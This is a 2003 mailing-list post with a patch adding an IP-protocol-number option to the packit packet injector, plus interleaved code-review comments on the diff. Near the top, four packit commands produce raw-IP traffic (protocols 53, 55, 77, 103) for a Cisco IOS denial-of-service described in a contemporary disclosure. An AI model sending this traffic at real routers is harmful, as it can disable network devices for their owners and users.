Hi all,

Unfortunately I forgot to add a packit option to specify an IPPROTO
number with RAWIP injection mode. I've attached a patch for 0.6.0c which
solves that. The release version on packit.sourceforge.net will be
updated in a few minutes.

The following commands can be used to generate the necessary traffic
types:

packit -t RAWIP -V 53 -d dst_ip -T ttl
packit -t RAWIP -V 55 -d dst_ip -T ttl
packit -t RAWIP -V 77 -d dst_ip -T ttl
packit -t RAWIP -V 103 -d dst_ip -T ttl


Please use it wisely.


Thanks,
-- 

Darren Bounds
Security Consultant
Information Security Services
Intrusense Inc.

--
Intrusense - Securing Business As Usual
diff -ur packit-0.6.0c/ChangeLog packit-0.6.0d/ChangeLog
--- packit-0.6.0c/ChangeLog	2003-06-03 17:31:54.000000000 -0400
+++ packit-0.6.0d/ChangeLog	2003-07-18 11:52:12.000000000 -0400
@@ -1,3 +1,8 @@
+0.6.0d  Darren Bounds <[EMAIL PROTECTED]>
+----------------------------------------------
+Injection
+    - Just added the -V option for RAWIP injection to allow you to specify an IP protocol number (brought on by the recent Cisco IOS DoS posting)
+
 0.6.0c  Darren Bounds <[EMAIL PROTECTED]>
 ----------------------------------------------
 General
diff -ur packit-0.6.0c/include/inject.h packit-0.6.0d/include/inject.h
--- packit-0.6.0c/include/inject.h	2003-06-03 17:29:18.000000000 -0400
+++ packit-0.6.0d/include/inject.h	2003-07-18 11:48:54.000000000 -0400
@@ -47,6 +47,7 @@
 u_int8_t *payload;
 u_int8_t *s_d_port;
 u_int8_t hwaddr_p[17];
+u_int8_t t;
 
 struct timeval bf_pcap;
 struct timeval af_pcap;
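Review bot: The new global `t` in this hunk has a one-letter name and no comment, so nothing at the declaration says what it holds or why it exists alongside `ip4hdr_o.p`. Judging from the other hunks, it appears to record the injection mode chosen with `-t`, so that a later `-V` override of `ip4hdr_o.p` does not change how the payload is attached. A descriptive name and a comment would make that visible, for example `u_int8_t inj_proto; /* protocol selected by -t; not changed by -V */`. The declaration list continues outside the hunk.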
diff -ur packit-0.6.0c/src/main.c packit-0.6.0d/src/main.c
--- packit-0.6.0c/src/main.c	2003-05-29 21:40:48.000000000 -0400
+++ packit-0.6.0d/src/main.c	2003-07-18 12:02:51.000000000 -0400
@@ -209,7 +209,7 @@
 #ifdef DEBUG
                     fprintf(stdout, "DEBUG: TCP injection\n");
 #endif
-                    ip4hdr_o.p = IPPROTO_TCP;
+                    t = ip4hdr_o.p = IPPROTO_TCP;
                     injection_type = ETHERTYPE_IP;
                     opts = "a:b:c:d:D:e:E:fF:hH:i:n:p:q:s:S:T:O:u:U:vw:W:";
                 }  
@@ -218,7 +218,7 @@
 #ifdef DEBUG
                     fprintf(stdout, "DEBUG: UDP injection\n");
 #endif
-                    ip4hdr_o.p = IPPROTO_UDP;
+                    t = ip4hdr_o.p = IPPROTO_UDP;
                     injection_type = ETHERTYPE_IP;
                     opts = "b:c:d:D:e:E:fhH:i:n:O:p:s:S:T:U:vw:";
                 }
@@ -227,7 +227,7 @@
 #ifdef DEBUG
                     fprintf(stdout, "DEBUG: ICMP injection\n");
 #endif
-                    ip4hdr_o.p = IPPROTO_ICMP;
+                    t = ip4hdr_o.p = IPPROTO_ICMP;
                     injection_type = ETHERTYPE_IP;
                     opts = "b:c:C:d:e:E:fg:G:hH:i:j:J:k:K:l:L:m:M:n:N:o:O:p:P:s:Q:t:T:U:vw:y:z:"; 
                 }
@@ -240,7 +240,7 @@
                     fprintf(stderr, "\nError: ARP injection is not yet supported on this OS platform.\n");
                     exit(FAILURE);
 #endif
-                    injection_type = ETHERTYPE_ARP;
+                    t = injection_type = ETHERTYPE_ARP;
                     opts = "A:b:c:r:R:e:E:i:o:p:s:S:U:vx:X:";
                 }
                 else if(!strncasecmp(optarg, "RAWIP", 3)) 
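Review bot: `t = injection_type = ETHERTYPE_ARP;` stores an EtherType in `t`, which the inject.h hunk declares as `u_int8_t`, so the 16-bit value 0x0806 is silently truncated to 0x06, the same number as IPPROTO_TCP. The only reader of `t` visible in this patch compares it with IPPROTO_RAW, so nothing misbehaves today, but any later test of `t` against an IP protocol constant would treat ARP mode as TCP. Keeping the two value spaces apart avoids that: leave this line as `injection_type = ETHERTYPE_ARP;` and do not assign `t` in the ARP branch, or widen `t` if it is meant to hold EtherTypes as well. The enclosing if/else chain starts and ends outside the hunk.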
@@ -248,9 +248,9 @@
 #ifdef DEBUG
                     fprintf(stdout, "DEBUG: raw IP injection\n");
 #endif
-                    ip4hdr_o.p = IPPROTO_RAW;
+                    t = ip4hdr_o.p = IPPROTO_RAW;
                     injection_type = ETHERTYPE_IP;
-                    opts = "b:c:d:e:E:f:i:n:O:p:s:T:U:vw:";
+                    opts = "b:c:d:e:E:f:i:n:O:p:s:T:U:vV:w:";
                 }
                 else 
                 {
@@ -264,7 +264,7 @@
             default:
                 optind--;
 
-                ip4hdr_o.p = IPPROTO_TCP;
+                t = ip4hdr_o.p = IPPROTO_TCP;
                 injection_type = ETHERTYPE_IP;
                 opts = "a:b:c:d:D:e:E:fF:hH:i:n:p:q:s:S:T:O:u:U:vw:W:";
 
@@ -555,6 +555,10 @@
             case 'u':
                 thdr_o.urp = (int)atoi(optarg);
                 break;
+
+            case 'V':
+                ip4hdr_o.p = (u_int16_t)atoi(optarg);
+                break;
  
             case 'v':
                 verbose = 1;
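Review bot: The new `case 'V'` takes the protocol number from `atoi(optarg)` with no validation. A non-numeric argument silently becomes 0, and a value above 255 is narrowed by the cast instead of being rejected, although the IPv4 protocol field is 8 bits wide. The argument should be parsed with `strtol`, checked for trailing characters and for the range 0 to 255, and refused with the same `fprintf(stderr, ...)` and `exit(FAILURE)` pattern the ARP branch uses. The fence keeps the original cast because the type of `ip4hdr_o.p` is not visible here; the switch statement starts and ends outside the hunk.

```c
            case 'V':
            {
                char *end = NULL;
                long proto = strtol(optarg, &end, 10);

                /* Reject empty, non-numeric and out-of-range input; an
                 * overflowed strtol() result also fails the range test. */
                if(end == optarg || *end != '\0' || proto < 0 || proto > 255)
                {
                    fprintf(stderr, "\nError: IP protocol number must be between 0 and 255.\n");
                    exit(FAILURE);
                }

                ip4hdr_o.p = (u_int16_t)proto;
                break;
            }
            /* ... unchanged: case 'v' ... */
```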
diff -ur packit-0.6.0c/src/shape_ipv4_hdr.c packit-0.6.0d/src/shape_ipv4_hdr.c
--- packit-0.6.0c/src/shape_ipv4_hdr.c	2003-05-29 21:40:48.000000000 -0400
+++ packit-0.6.0d/src/shape_ipv4_hdr.c	2003-07-18 11:50:44.000000000 -0400
@@ -78,8 +78,8 @@
         ip4hdr_o.sum,
         ip4hdr_o.n_saddr,
         ip4hdr_o.n_daddr,
-        (ip4hdr_o.p == IPPROTO_RAW) ? payload : NULL,
-        (ip4hdr_o.p == IPPROTO_RAW) ? payload_len : 0,
+        (t == IPPROTO_RAW) ? payload : NULL,
+        (t == IPPROTO_RAW) ? payload_len : 0,
         pkt_d,
         0) == -1)
     {
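Review bot: The two changed arguments now test the global `t` instead of `ip4hdr_o.p`, and nothing at this call site explains why a separate variable decides whether the payload is attached. A short comment above them would spare the next reader a trip through main.c, for example `/* t holds the mode chosen by -t; ip4hdr_o.p may have been overridden by -V */`. The call these arguments belong to starts outside the hunk.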
diff -ur packit-0.6.0c/src/usage.c packit-0.6.0d/src/usage.c
--- packit-0.6.0c/src/usage.c	2003-05-31 18:39:19.000000000 -0400
+++ packit-0.6.0d/src/usage.c	2003-07-18 12:00:29.000000000 -0400
@@ -120,6 +120,7 @@
     fprintf(stdout, "  -o tos      Type of service\n");
     fprintf(stdout, "  -s address  Source address\n");
     fprintf(stdout, "  -T ttl      Time to live (Default: 128)\n");
+    fprintf(stdout, "  -V ipproto  IP protocol number (RAWIP only)\n");
     fprintf(stdout, "\n"); 
 
 #ifndef MACOS 
diff -ur packit-0.6.0c/VERSION packit-0.6.0d/VERSION
--- packit-0.6.0c/VERSION	2003-06-03 17:14:15.000000000 -0400
+++ packit-0.6.0d/VERSION	2003-07-18 11:52:17.000000000 -0400
@@ -1 +1 @@
-0.6.0c
+0.6.0d
